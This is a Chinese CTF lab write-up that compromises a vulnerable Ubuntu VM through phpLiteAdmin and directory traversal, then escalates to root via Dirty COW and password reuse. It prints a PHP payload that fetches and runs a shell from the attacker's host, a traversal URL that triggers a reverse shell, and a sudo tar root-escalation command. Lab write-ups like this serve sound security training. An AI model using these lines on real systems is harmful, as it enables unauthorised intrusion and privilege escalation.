CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权

2024-02-29 01:32

本文主要是介绍CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

实验环境

攻击者:Kali Linux(192.168.0.19)
靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(64-bit)(192.168.0.249)

实验流程

  • 端口扫描
    在这里插入图片描述
  • 目录扫描
    其中/dbadmin/疑似网站数据库后台管理页面
    在这里插入图片描述
  • 访问url:http://192.168.0.249/dbadmin
    在这里插入图片描述在这里插入图片描述
  • 弱口令:admin
    在这里插入图片描述
  • 该web程序为phpliteadmin v1.9.3,存在远程代码执行漏洞,没有溢出代码,但是有一个利用文档中包含了对于该web应用程序getshell的流程,其中上传的PHP脚本文件需要进行访问才能生效。
    在这里插入图片描述在这里插入图片描述
  • 漏洞探测
    通过对该网站进行漏洞扫描发现该网站存在目录遍历漏洞
    在这里插入图片描述
  • 目录遍历漏洞验证
    在这里插入图片描述
  • 结合phpliteadmin的代码执行漏洞和目录遍历漏洞getshell
    输入数据库名称,点击create创建数据库——hack.php
    在这里插入图片描述点击新创建的数据库,输入数据表名称和数据表中的字段数量,点击go,创建数据表
    在这里插入图片描述输入字段名、字段类型,点击create创建字段,注意字段类型选择text。
    在这里插入图片描述准备好要上传到服务器上面的文件
    在这里插入图片描述
    利用python创建HTTP服务,将root用户的家目录作为网站的根目录
    在这里插入图片描述
    点击新创建的数据库,选中新创建的数据表,点击insert插入数据。<?php system("wget http://192.168.0.19:8000/shell.php -O /tmp/shell.php; chmod +x /tmp/shell.php; php /tmp/shell.php;"); ?>
    在这里插入图片描述
    攻击机监听端口
    在这里插入图片描述利用目录遍历漏洞访问该文件反弹shell:http://192.168.0.249/view.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/usr/databases/hack.php
    在这里插入图片描述
  • 获取当前权限:www-data是Linux操作系统中运行web服务的默认用户(权限较低)
    在这里插入图片描述
  • 获取操作系统内发行版本(Ubuntu 12.04.5 LTS)和内核版本(3.2.0-23-generic)
    在这里插入图片描述
    判断是否存在代码溢出漏洞,有溢出代码
    在这里插入图片描述
  • 利用脏牛提权(cve-2016-5159)
    将提权文件上传到靶机
    溢出代码下地址:https://github.com/FireFart/dirtycow
    在这里插入图片描述
    在这里插入图片描述访问对应的数据库文件
    在这里插入图片描述在这里插入图片描述
    优化shell
    在这里插入图片描述
    编译并执行溢出代码
    在这里插入图片描述
    赋予执行权限
    在这里插入图片描述
    执行溢出代码
    在这里插入图片描述
    切换用户
    在这里插入图片描述
  • 获取flag
    在这里插入图片描述
  • 利用密码复用进行提权
    因为需要涉及到切换用户的问题同样需要利用python优化shell
    利用获取到的低权限用户在系统中搜寻敏感信息,寻找一些可能存储了密码的敏感文件或者网站的配置文件等,一定要查看系统用户的家目录。
    在这里插入图片描述
    通过查看网站的配置文件拿到数据库用户zico的登录密码
    在这里插入图片描述
    尝试使用该密码切换到zico用户,成功
    在这里插入图片描述
    查看当前用户权限,普通系统用户。
    在这里插入图片描述
    查看当前用户使用sudo命令时的权限
    当前用户在使用tar命令和zip命令时拥有root用户的权限,并且不需要验证密码
    在这里插入图片描述
    利用zip提权
    首先创建一个空文件
    在这里插入图片描述
    提权成功
    在这里插入图片描述
    同样可以利用tar命令进行提权
    sudo -u root tar cf /dev/null exp -checkpoint=1 --checkpoint-action="/bin/bash"

这篇关于CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/757203

相关文章

Linux系统中查询JDK安装目录的几种常用方法

《Linux系统中查询JDK安装目录的几种常用方法》:本文主要介绍Linux系统中查询JDK安装目录的几种常用方法,方法分别是通过update-alternatives、Java命令、环境变量及目... 目录方法 1:通过update-alternatives查询(推荐)方法 2:检查所有已安装的 JDK方

Linux下删除乱码文件和目录的实现方式

《Linux下删除乱码文件和目录的实现方式》:本文主要介绍Linux下删除乱码文件和目录的实现方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux下删除乱码文件和目录方法1方法2总结Linux下删除乱码文件和目录方法1使用ls -i命令找到文件或目录

Spring Security中用户名和密码的验证完整流程

《SpringSecurity中用户名和密码的验证完整流程》本文给大家介绍SpringSecurity中用户名和密码的验证完整流程,本文结合实例代码给大家介绍的非常详细,对大家的学习或工作具有一定... 首先创建了一个UsernamePasswordAuthenticationTChina编程oken对象,这是S

mysql中的数据目录用法及说明

《mysql中的数据目录用法及说明》:本文主要介绍mysql中的数据目录用法及说明,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1、背景2、版本3、数据目录4、总结1、背景安装mysql之后,在安装目录下会有一个data目录,我们创建的数据库、创建的表、插入的

如何使用Maven创建web目录结构

《如何使用Maven创建web目录结构》:本文主要介绍如何使用Maven创建web目录结构的问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录创建web工程第一步第二步第三步第四步第五步第六步第七步总结创建web工程第一步js通过Maven骨架创pytho

PostgreSQL数据库密码被遗忘时的操作步骤

《PostgreSQL数据库密码被遗忘时的操作步骤》密码遗忘是常见的用户问题,因此提供一种安全的遗忘密码找回机制是十分必要的,:本文主要介绍PostgreSQL数据库密码被遗忘时的操作步骤的相关资... 目录前言一、背景知识二、Windows环境下的解决步骤1. 找到PostgreSQL安装目录2. 修改p

MySQL存储过程之循环遍历查询的结果集详解

《MySQL存储过程之循环遍历查询的结果集详解》:本文主要介绍MySQL存储过程之循环遍历查询的结果集,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录前言1. 表结构2. 存储过程3. 关于存储过程的SQL补充总结前言近来碰到这样一个问题:在生产上导入的数据发现

Linux使用scp进行远程目录文件复制的详细步骤和示例

《Linux使用scp进行远程目录文件复制的详细步骤和示例》在Linux系统中,scp(安全复制协议)是一个使用SSH(安全外壳协议)进行文件和目录安全传输的命令,它允许在远程主机之间复制文件和目录,... 目录1. 什么是scp?2. 语法3. 示例示例 1: 复制本地目录到远程主机示例 2: 复制远程主

Druid连接池实现自定义数据库密码加解密功能

《Druid连接池实现自定义数据库密码加解密功能》在现代应用开发中,数据安全是至关重要的,本文将介绍如何在​​Druid​​连接池中实现自定义的数据库密码加解密功能,有需要的小伙伴可以参考一下... 目录1. 环境准备2. 密码加密算法的选择3. 自定义 ​​DruidDataSource​​ 的密码解密3

SpringBoot如何对密码等敏感信息进行脱敏处理

《SpringBoot如何对密码等敏感信息进行脱敏处理》这篇文章主要为大家详细介绍了SpringBoot对密码等敏感信息进行脱敏处理的几个常用方法,文中的示例代码讲解详细,感兴趣的小伙伴可以了解下... 目录​1. 配置文件敏感信息脱敏​​2. 日志脱敏​​3. API响应脱敏​​4. 其他注意事项​​总结